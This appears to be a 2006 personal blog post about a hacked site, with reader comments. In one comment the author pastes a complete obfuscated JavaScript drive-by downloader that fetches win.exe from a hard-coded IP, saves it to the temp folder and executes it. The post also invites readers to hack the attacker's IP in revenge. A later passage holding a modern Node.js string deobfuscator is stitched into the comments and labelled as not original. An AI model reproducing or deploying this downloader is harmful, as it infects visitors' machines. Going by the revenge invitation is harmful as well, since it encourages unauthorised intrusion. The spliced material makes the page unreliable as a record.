GregHowley.com

Hack Attempt

July 18, 2006

You may have noticed the long string of PHP errors at the top of my site this morning. Turns out some jerk just inserted a 1-pixel iframe with a link to IP address 81.95.146.98, which holds an obfuscated script. From what I can tell, it's saving Environment() to disk, whatever that is. Stealing some info.

I'd never have noticed if not for the fact that the iframe was inserted in front of my page headers, creating that PHP error. Anyway, if anyone knows how to invade that IP address and get revenge, feel free.

Jerks also left an invalid character after my footer which invalidated my XHTML. Bastards.

UPDATE: Just got an email from Carl of BostonGeek who tells me that the code set off his antivirus software. I'm gonna post that code in the comments if you feel like taking a look.

Comments on Hack Attempt
 
Comment Tue, July 18 - 12:29 PM by Greg

function f(b, a, c) { return a + b + c; }
function g(b, a) { return a + b; }
var s = new Array
(
"",
"win.exe",
"http://81.95.146.98/",
"object",
"classid",
f("0C0", g(f(g("3-11D0-9", "56-65A"), "id:BD96C5", "83A-0"), "cls"), g("9E36", "4FC2")),
g(f("ft.XMLH", "oso", "TTP"), "Micr"),
f("E", "G", "T"),
f(g(".Str", "odb"), "Ad", "eam"),
f(g(".She", "ipt"), "WScr", "ll"),
"PROCESS",
"TMP",
"/[^/]*$",
"/",
"\\"
);
a = document.createElement(s[3]);
a.setAttribute(s[4], s[5]);
with(a.CreateObject(s[6], s[0]))
{
open(s[7], location.href.replace(new RegExp(s[12]), s[13] + s[1]), false);
send();
if(status < 400)
with(a.CreateObject(s[8], s[0]))
{
Type = 1;
Open();
Write(responseBody);
with(a.CreateObject(s[9], s[0]))
{
c = Environment(s[10])(s[11]) + s[14] + s[1];
SaveToFile(c, 2);
Exec(c);
}
}
}
location.replace(s[2]);
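The string table in the script above hides its component names behind nested f()/g() concatenations. As an added example (not part of the original comment), this Node.js snippet folds those calls statically so the strings can be read for triage without running the sample; `FOLD`, `foldExpr`, `SAMPLE_EXPRS` and `decodeAll` are names made up here.

```javascript
// Added example: statically folds the f()/g() concatenations from the posted
// script. Nothing from the sample is executed; only string literals are joined.
// Same argument order as the sample: f(b, a, c) -> a + b + c, g(b, a) -> a + b.
const FOLD = { f: (b, a, c) => a + b + c, g: (b, a) => a + b };

// foldExpr (name made up here) accepts only "literal", f(...) and g(...).
function foldExpr(src) {
  let pos = 0;
  const skipWs = () => { while (/\s/.test(src[pos] || "")) pos++; };
  const expect = (ch) => {
    skipWs();
    if (src[pos++] !== ch) throw new SyntaxError(`expected '${ch}' near offset ${pos - 1}`);
  };
  function parse() {
    skipWs();
    if (src[pos] === '"') { // plain double-quoted literal, escapes rejected
      const end = src.indexOf('"', pos + 1);
      if (end < 0) throw new SyntaxError("unterminated string");
      const lit = src.slice(pos + 1, end);
      if (lit.includes("\\")) throw new SyntaxError("escapes not supported");
      pos = end + 1;
      return lit;
    }
    const name = src[pos++];
    if (name !== "f" && name !== "g") throw new SyntaxError(`unexpected input near offset ${pos - 1}`);
    expect("(");
    const args = [parse()];
    for (skipWs(); src[pos] === ","; skipWs()) { pos++; args.push(parse()); }
    expect(")");
    if (args.length !== FOLD[name].length) throw new SyntaxError(`${name}() arity mismatch`);
    return FOLD[name](...args);
  }
  const out = parse();
  skipWs();
  if (pos !== src.length) throw new SyntaxError(`trailing input at offset ${pos}`);
  return out;
}

// Entries s[5]..s[9], copied from the script in the comment above.
const SAMPLE_EXPRS = [
  'f("0C0", g(f(g("3-11D0-9", "56-65A"), "id:BD96C5", "83A-0"), "cls"), g("9E36", "4FC2"))',
  'g(f("ft.XMLH", "oso", "TTP"), "Micr")',
  'f("E", "G", "T")',
  'f(g(".Str", "odb"), "Ad", "eam")',
  'f(g(".She", "ipt"), "WScr", "ll")',
];
const decodeAll = () => SAMPLE_EXPRS.map(foldExpr);
console.log(decodeAll());
```

The parser rejects anything that is not a string literal or an f()/g() call, so pasting other parts of a hostile script into it fails instead of being evaluated.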
 
Comment Thu, July 20 - 6:38 PM by /gLeNn/>.*
I'm highly jealous of your mysterious computer terms. Seriously though, that sneaky 1-pixel-iframe-inserter's got a lot of nerve invalidating your XHTML. If I ever see that good for nothing, IP address-linking bum on the street, I'll PHP error him in the face! And then I'll obfuscate his script!